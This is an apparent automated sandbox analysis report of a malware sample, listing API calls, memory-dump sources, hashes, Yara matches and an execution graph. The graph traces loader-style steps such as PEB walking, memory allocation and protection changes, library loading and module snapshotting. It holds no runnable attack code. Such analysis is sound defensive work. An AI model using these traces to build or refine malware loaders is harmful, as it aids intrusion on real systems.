• String ID:
• API String ID: 3016159387-0
APIs
• SetThreadPriority.KERNEL32(?,?), ref: 00412681
• GetLastError.KERNEL32 ref: 0041268D
• Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004126A3
• __CxxThrowException@8.LIBVCRUNTIME ref: 004126B1
Memory Dump Source
• Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
Similarity
• API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastPriorityThreadThrow
• String ID:
• API String ID: 4286982218-0
APIs
• TlsSetValue.KERNEL32(?,00000000,00417961,00000000,?,?,00410B29,?,?,?,00000000,?,00000000), ref: 00412747
• GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 00412753
• Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412769
• __CxxThrowException@8.LIBVCRUNTIME ref: 00412777
Memory Dump Source
• Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
Similarity
• API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowValue
• String ID:
• API String ID: 1964976909-0
APIs
• SetThreadPriority.KERNEL32(?,?), ref: 021128E8
• GetLastError.KERNEL32 ref: 021128F4
• Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0211290A
• __CxxThrowException@8.LIBVCRUNTIME ref: 02112918
Memory Dump Source
• Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
Yara matches
Similarity
• API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastPriorityThreadThrow
• String ID:
• API String ID: 4286982218-0
APIs
• TlsSetValue.KERNEL32(?,00000000,02117BC8,00000000,?,?,02110D90,?,?,?,00000000,?,00000000), ref: 021129AE
• GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 021129BA
• Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 021129D0
• __CxxThrowException@8.LIBVCRUNTIME ref: 021129DE
Memory Dump Source
• Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
Yara matches
Similarity
• API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowValue
• String ID:
• API String ID: 1964976909-0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • TlsAlloc.KERNEL32(?,00410B29), ref: 004126E8
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 004126F5
                                                                                                                                                                                                                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041270B
                                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00412719
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3103352999-0
                                                                                                                                                                                                                                                  • Opcode ID: db4e8f81990c41efe0c5f892a1b43a96577a226854f9efbb8f129dbc0f0677bf
                                                                                                                                                                                                                                                  • Instruction ID: 1ad0294434ecfca40659a618dd28aba5f9447f5ceacad7becc2ff902d53fffbc
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: db4e8f81990c41efe0c5f892a1b43a96577a226854f9efbb8f129dbc0f0677bf
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 01E0CD3450011567C714BF759D09ABF72587901719BA00A1AF131D20D1EAACD458415C
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • TlsAlloc.KERNEL32(?,02110D90), ref: 0211294F
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0211295C
                                                                                                                                                                                                                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02112972
                                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 02112980
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3103352999-0
                                                                                                                                                                                                                                                  • Opcode ID: db4e8f81990c41efe0c5f892a1b43a96577a226854f9efbb8f129dbc0f0677bf
                                                                                                                                                                                                                                                  • Instruction ID: be241a68b6d72f46dbce8e5feff741b604a0d4df38facc4963aa0939c6d1e86d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: db4e8f81990c41efe0c5f892a1b43a96577a226854f9efbb8f129dbc0f0677bf
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9BE0C2301401396B8724BB789C48A7F32A86A01B15FA00B35E861E20E4EB78D0084AA8
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __startOneArgErrorHandling.LIBCMT ref: 0042F0FD
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorHandling__start
                                                                                                                                                                                                                                                  • String ID: pow
                                                                                                                                                                                                                                                  • API String ID: 3213639722-2276729525
                                                                                                                                                                                                                                                  • Opcode ID: cb57d0990ecd4e157a276670056fa63ecf5c6ef3cb6d4436f05d56c4fa4236c6
                                                                                                                                                                                                                                                  • Instruction ID: a192877c9f0054c0872b9fb76e5ad9458d959ccc769b6dca3ba9f50539c5e518
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cb57d0990ecd4e157a276670056fa63ecf5c6ef3cb6d4436f05d56c4fa4236c6
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8B515C61B0431296DB117B14E90137BBBB0AB54B00FE05D7FF491423A9EE3D8CA99A4F
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: s2C$s2C
                                                                                                                                                                                                                                                  • API String ID: 0-1833909196
                                                                                                                                                                                                                                                  • Opcode ID: d26f55ed8b89044789a372bd2a44fa0211c5dd18a725056bdf55d7f93a069115
                                                                                                                                                                                                                                                  • Instruction ID: de90a671c5843db736048dba6cdd1094f879e2809fe80a987d64bac264933c47
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d26f55ed8b89044789a372bd2a44fa0211c5dd18a725056bdf55d7f93a069115
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0F51E731E04205EBCB20DF54C982B6EB770FF19314F24915BD5599B3D1E6B8E982CB89
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 0212895A
                                                                                                                                                                                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 02128A13
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                  • String ID: csm
                                                                                                                                                                                                                                                  • API String ID: 3480331319-1018135373
                                                                                                                                                                                                                                                  • Opcode ID: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                                                                                                                                                                                                                  • Instruction ID: fb84dd97583dcbc8924aa503de9c770b9ebbb38e953c2ce64d04d379562d258c
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7B411830A40228DFCF10DF28C844A9EBBB5BF85328F158165F9156B391D732DA29CFA1
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0043B0B4,?,00000050,?,?,?,?,?), ref: 0043AF34
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: ACP$OCP
                                                                                                                                                                                                                                                  • API String ID: 0-711371036
                                                                                                                                                                                                                                                  • Opcode ID: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                                                                                                                                                                                                                  • Instruction ID: e3ba11e5d781d2b130423e2bf0cbd093d466219ebf659edcdfcd25fe82a6d734
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E2214BA2AC0101A6DB30CB55C902B9B7356EF6CB24F569526EA89C7300F73EDD11C35E
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0213B31B,?,00000050,?,?,?,?,?), ref: 0213B19B
                                                                                                                                                                                                                                                  Strings
Memory Dump Source
• Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
Yara matches
Similarity
• API ID:
• String ID: ACP$OCP
• API String ID: 0-711371036
APIs
• GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 00401F1B
• GdipGetImageEncoders.GDIPLUS(?,?,00000000), ref: 00401F40
Strings
Memory Dump Source
• Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
Similarity
• API ID: EncodersGdipImage$Size
• String ID: image/png
• API String ID: 864223233-2966254431
APIs
• SetLastError.KERNEL32(0000000D,?,0040DE37,0040C64F,?,?,00000000,?,0040C51F,0045D5E4,0040C4EC,0045D5DC,?,ios_base::failbit set,0040C64F), ref: 0040EFA0
Strings
Memory Dump Source
• Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
Similarity
• API ID: ErrorLast
• String ID: <(@
• API String ID: 1452528299-4189137628
APIs
• ___std_exception_destroy.LIBVCRUNTIME ref: 0040C54A
Strings
Memory Dump Source
• Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
Similarity
• API ID: ___std_exception_destroy
• String ID: <(@$ios_base::failbit set
• API String ID: 4194217158-2207043977
APIs
• std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041DA43
• __CxxThrowException@8.LIBVCRUNTIME ref: 0041DA51
Strings
Memory Dump Source
• Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
Similarity
• API ID: Exception@8Throwstd::invalid_argument::invalid_argument
• String ID: pContext
• API String ID: 1687795959-2046700901
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
Similarity
• API ID: H_prolog3_catch
• String ID: MOC$RCC
• API String ID: 3886170330-2084237596
APIs
  • Part of subcall function 02139764: GetEnvironmentStringsW.KERNEL32 ref: 02139768
• _free.LIBCMT ref: 0212FCB6
• _free.LIBCMT ref: 0212FCBD
Strings
Memory Dump Source
• Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
Yara matches
Similarity
• API ID: _free$EnvironmentStrings
• String ID: Ub
• API String ID: 3523873077-2742826647
APIs
• std::_Locinfo::_Locinfo.LIBCPMT ref: 00404E32
  • Part of subcall function 0040BF53: std::_Lockit::_Lockit.LIBCPMT ref: 0040BF67
  • Part of subcall function 0040BF53: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040BFA4
• std::_Locinfo::~_Locinfo.LIBCPMT ref: 00404E46
  • Part of subcall function 0040BFFE: std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0040C025
  • Part of subcall function 0040BFFE: std::_Lockit::~_Lockit.LIBCPMT ref: 0040C096
Strings
Memory Dump Source
• Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
Similarity
• API ID: std::_$Locinfo::_$LocinfoLockit$Locinfo::~_Locinfo_ctorLocinfo_dtorLockit::_Lockit::~_
• String ID: F@
• API String ID: 2118720939-885931407
APIs
• std::__non_rtti_object::__construct_from_string_literal.LIBVCRUNTIME ref: 00428D73
• __CxxThrowException@8.LIBVCRUNTIME ref: 00428D9A
  • Part of subcall function 004285FD: RaiseException.KERNEL32(?,?,0040D874,00000000,00000000,00000000,00000000,?,?,?,?,0040D874,00000000,0045617C,00000000), ref: 0042865D
Strings
• Access violation - no RTTI data!, xrefs: 00428D6A
Memory Dump Source
• Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
Similarity
• API ID: ExceptionException@8RaiseThrowstd::__non_rtti_object::__construct_from_string_literal
• String ID: Access violation - no RTTI data!
• API String ID: 2053020834-2158758863
APIs
• Concurrency::details::InternalContextBase::~InternalContextBase.LIBCONCRT ref: 0042381E
Strings
Memory Dump Source
• Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
Similarity
• API ID: ContextInternal$BaseBase::~Concurrency::details::
• String ID: jB$nB
• API String ID: 3275300208-1818383504
APIs
• std::invalid_argument::invalid_argument.LIBCONCRT ref: 004212CB
• __CxxThrowException@8.LIBVCRUNTIME ref: 004212D9
Strings
Memory Dump Source
• Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
Similarity
• API ID: Exception@8Throwstd::invalid_argument::invalid_argument
• String ID: pThreadProxy
• API String ID: 1687795959-3651400591
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
Similarity
• API ID: CommandLine
• String ID: %a
• API String ID: 3253501508-913774005
APIs
• MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,<(@,00000000), ref: 0042AF10
• GetLastError.KERNEL32 ref: 0042AF1E
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 0042AF79
Memory Dump Source
• Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
Similarity
• API ID: ByteCharMultiWide$ErrorLast
• String ID:
• API String ID: 1717984340-0
APIs
• MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,02102AA3,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,02102AA3,00000000), ref: 0212B177
• GetLastError.KERNEL32 ref: 0212B185
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,02102AA3,00000000), ref: 0212B1E0
Memory Dump Source
• Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
Yara matches
Similarity
• API ID: ByteCharMultiWide$ErrorLast
• String ID:
• API String ID: 1717984340-0

Execution Graph

Execution Coverage: 1.5%
Dynamic/Decrypted Code Coverage: 31.6%
Signature Coverage: 11.2%
Total number of Nodes: 98
Total number of Limit Nodes: 6
                                                                                                                                                                                                                                                  execution_graph 26196 408880 26198 40888f 26196->26198 26197 408ab5 ExitProcess 26198->26197 26199 4088a4 GetCurrentProcessId GetCurrentThreadId 26198->26199 26205 408a9e 26198->26205 26200 4088ca 26199->26200 26201 4088ce SHGetSpecialFolderPathW GetForegroundWindow 26199->26201 26200->26201 26203 408974 26201->26203 26208 43eb20 26203->26208 26212 440240 FreeLibrary 26205->26212 26206 4089cf 26206->26205 26211 40ba80 FreeLibrary FreeLibrary 26206->26211 26213 441850 26208->26213 26210 43eb2a RtlAllocateHeap 26210->26206 26211->26205 26212->26197 26214 441870 26213->26214 26214->26210 26214->26214 26220 40ab12 26221 40ab22 26220->26221 26222 40ab3d WSAStartup 26221->26222 26223 2160005 26228 216092b GetPEB 26223->26228 26225 2160030 26229 216003c 26225->26229 26228->26225 26230 2160049 26229->26230 26244 2160e0f SetErrorMode SetErrorMode 26230->26244 26235 2160265 26236 21602ce VirtualProtect 26235->26236 26238 216030b 26236->26238 26237 2160439 VirtualFree 26241 21604be 26237->26241 26242 21605f4 LoadLibraryA 26237->26242 26238->26237 26239 21604e3 LoadLibraryA 26239->26241 26241->26239 26241->26242 26243 21608c7 26242->26243 26245 2160223 26244->26245 26246 2160d90 26245->26246 26247 2160dad 26246->26247 26248 2160dbb GetPEB 26247->26248 26249 2160238 VirtualAlloc 26247->26249 26248->26249 26249->26235 26250 443190 26252 4431b0 26250->26252 26251 443298 26252->26251 26254 4402c0 LdrInitializeThunk 26252->26254 26254->26251 26255 4434d0 26256 44350f 26255->26256 26257 4434e9 26255->26257 26257->26256 26261 4402c0 LdrInitializeThunk 26257->26261 26259 443538 26259->26256 26262 4402c0 LdrInitializeThunk 26259->26262 26261->26259 26262->26256 26263 602ef5 26264 602ef9 26263->26264 26267 602fee 26264->26267 26268 602ffd 
26267->26268 26271 60378e 26268->26271 26276 6037a9 26271->26276 26272 6037b2 CreateToolhelp32Snapshot 26273 6037ce Module32First 26272->26273 26272->26276 26274 602fed 26273->26274 26275 6037dd 26273->26275 26278 60344d 26275->26278 26276->26272 26276->26273 26279 603478 26278->26279 26280 6034c1 26279->26280 26281 603489 VirtualAlloc 26279->26281 26280->26280 26281->26280 26282 4404b1 GetForegroundWindow 26283 4404ce 26282->26283 26289 440cde 26290 440ce8 26289->26290 26290->26290 26292 440dae 26290->26292 26295 4402c0 LdrInitializeThunk 26290->26295 26294 4402c0 LdrInitializeThunk 26292->26294 26294->26292 26295->26292 26296 40a69b 26297 40a770 26296->26297 26297->26297 26302 40b2b0 26297->26302 26299 40a7b9 26300 40b2b0 3 API calls 26299->26300 26301 40a8d9 26300->26301 26303 40b340 26302->26303 26303->26303 26304 40b365 26303->26304 26306 440260 26303->26306 26304->26299 26307 4402a5 26306->26307 26308 440286 26306->26308 26309 440278 26306->26309 26310 44029a 26306->26310 26315 43eb40 26307->26315 26314 44028b RtlReAllocateHeap 26308->26314 26309->26307 26309->26308 26311 43eb20 RtlAllocateHeap 26310->26311 26313 4402a0 26311->26313 26313->26303 26314->26313 26316 43eb53 26315->26316 26317 43eb55 26315->26317 26316->26313 26318 43eb5a RtlFreeHeap 26317->26318 26318->26313 26319 4409b8 26320 4409d0 26319->26320 26322 440a3e 26320->26322 26325 4402c0 LdrInitializeThunk 26320->26325 26323 440a8e 26322->26323 26326 4402c0 LdrInitializeThunk 26322->26326 26325->26322 26326->26323 26215 4406eb 26216 44072e 26215->26216 26217 44070c 26215->26217 26217->26216 26219 4402c0 LdrInitializeThunk 26217->26219 26219->26216

Control-flow Graph

APIs
• GetCurrentProcessId.KERNEL32 ref: 004088A4
• GetCurrentThreadId.KERNEL32 ref: 004088AE
• SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 00408955
• GetForegroundWindow.USER32 ref: 0040896A
• ExitProcess.KERNEL32 ref: 00408AB7
Strings
Memory Dump Source
• Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_EB86.jbxd
Similarity
• API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
• String ID: 6W01
• API String ID: 4063528623-326071965
• Opcode ID: 39779329cba8329f932d9f79242290fe4725b3bdf2e9b5d89c9d7ceec3140c35
• Instruction ID: 68999dc676c32329d0dd7cdb3a03855c51f4a57e0b82bf1efaa177e53c028fce
• Opcode Fuzzy Hash: 39779329cba8329f932d9f79242290fe4725b3bdf2e9b5d89c9d7ceec3140c35
• Instruction Fuzzy Hash: A0516A73B443040BD328EF659C46356BA879BC5314F0AC13EA985BB7E2ED78980586CA

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 119 40b2b0-40b338 120 40b340-40b349 119->120 120->120 121 40b34b-40b35e 120->121 123 40b700-40b74a 121->123 124 40b661-40b6ab call 408040 121->124 125 40b6b4-40b6ff 121->125 126 40b365-40b367 121->126 127 40b658-40b65c 121->127 128 40b36c-40b5a5 121->128 139 40b750-40b757 123->139 124->125 125->123 131 40ba61-40ba67 126->131 129 40ba52-40ba5e 127->129 132 40b5b0-40b635 128->132 129->131 136 40ba70 131->136 132->132 137 40b63b-40b646 132->137 138 40b64a-40b651 137->138 138->123 138->124 138->125 138->127 138->139 140 40ba00 138->140 141 40b804-40b80b 138->141 142 40b904-40b908 138->142 143 40b7c5 138->143 144 40ba06-40ba0a 138->144 145 40b7cb-40b7d1 138->145 146 40b80d-40b81f 138->146 147 40b90d-40b92d 138->147 148 40b94d-40b954 138->148 149 40b990-40b994 138->149 150 40ba11-40ba16 138->150 151 40b9d8-40b9f4 138->151 152 40b95b-40b970 call 441c40 138->152 153 40b8dc-40b8e6 138->153 154 40ba1d 138->154 155 40b75e-40b76c 138->155 156 40b7e0-40b7e6 138->156 157 40ba23-40ba30 138->157 158 40b9a3-40b9b5 138->158 159 40b8ed-40b902 call 441c40 138->159 160 40b7ef-40b7fd 138->160 161 40b972-40b976 138->161 162 40b934-40b946 138->162 163 40ba35-40ba38 138->163 164 40b97b-40b984 138->164 165 40b9bc-40b9c2 call 440260 138->165 166 40b9fd-40b9ff 138->166 139->136 139->140 139->141 139->142 139->143 139->144 139->145 139->146 139->147 139->148 139->149 139->150 139->151 139->152 139->153 139->154 139->155 139->156 139->157 139->158 139->159 139->160 139->161 139->162 139->163 139->164 139->165 139->166 167 40ba49 139->167 168 40b7a0-40b7bd call 441c40 139->168 169 40ba72-40ba79 139->169 170 40b773 139->170 171 40b779-40b794 call 441c40 139->171 174 40b83c-40b867 141->174 177 40ba3f-40ba42 142->177 143->145 144->136 144->142 144->150 144->152 144->154 144->159 144->161 144->163 144->167 144->168 144->169 144->170 144->171 145->156 175 40b820-40b834 146->175 147->136 147->140 147->142 147->144 147->148 147->149 147->150 147->151 147->152 147->154 147->157 147->158 147->159 147->161 147->162 147->163 147->164 147->165 147->166 147->167 147->168 147->169 147->170 147->171 148->136 148->142 148->152 148->159 148->161 148->167 148->168 148->169 148->170 148->171 186 40b99d 149->186 150->136 150->142 150->152 150->154 150->159 150->161 150->163 150->167 150->168 150->169 150->170 150->171 151->166 152->161 153->136 153->142 153->159 153->167 153->168 153->169 153->170 153->171 155->136 155->167 155->168 155->169 155->170 155->171 156->160 157->149 158->136 158->140 158->142 158->144 158->150 158->151 158->152 158->154 158->159 158->161 158->163 158->165 158->166 158->167 158->168 158->169 158->170 158->171 159->142 160->136 160->140 160->141 160->142 160->144 160->146 160->147 160->148 160->149 160->150 160->151 160->152 160->153 160->154 160->157 160->158 160->159 160->161 160->162 160->163 160->164 160->165 160->166 160->167 160->168 160->169 160->170 160->171 161->163 162->136 162->140 162->142 162->144 162->148 162->149 162->150 162->151 162->152 162->154 162->157 162->158 162->159 162->161 162->163 162->164 162->165 162->166 162->167 162->168 162->169 162->170 162->171 163->177 164->149 189 40b9c7-40b9d1 165->189 166->140 167->129 168->143 171->168 188 40b870-40b8b6 174->188 175->175 187 40b836-40b839 175->187 177->167 186->158 187->174 188->188 192 40b8b8-40b8d5 188->192 189->136 189->140 189->142 189->144 189->150 189->151 189->152 189->154 189->159 189->161 189->163 189->166 189->167 189->168 189->169 189->170 189->171 192->136 192->140 192->142 192->144 192->147 192->148 192->149 192->150 192->151 192->152 192->153 192->154 192->157 192->158 192->159 192->161 192->162 192->163 192->164 192->165 192->166 192->167 192->168 192->169 192->170 192->171
Strings
Memory Dump Source
• Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_EB86.jbxd
Similarity
• API ID:
• String ID: 6C(]$?_oY$@w@q$Bc*}$K{Du$`/()$fWpQ
• API String ID: 0-74227037
• Opcode ID: 38d3abca32f2cf0db45db9bcd24ebb0db54af3e6334d844c9839fcbf09972b5b
• Instruction ID: 6cbb9b4a16d706e95eb7c5eb543f19fb0438a443f67131002351f3f2f8f3bf58
• Opcode Fuzzy Hash: 38d3abca32f2cf0db45db9bcd24ebb0db54af3e6334d844c9839fcbf09972b5b
• Instruction Fuzzy Hash: FA1299B5205B01CFD324CF25D891B97BBF6FB45314F058A2DD5AA8BAA0DB74A406CF84

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 271 40aa32-40aa35 272 40aa82 271->272 273 40aa37-40aa5f 271->273 274 40aa60-40aa72 273->274 274->274 275 40aa74-40aa7b 274->275 278 40aa00-40aa12 275->278 278->278 279 40aa14-40aa2e 278->279
Strings
Memory Dump Source
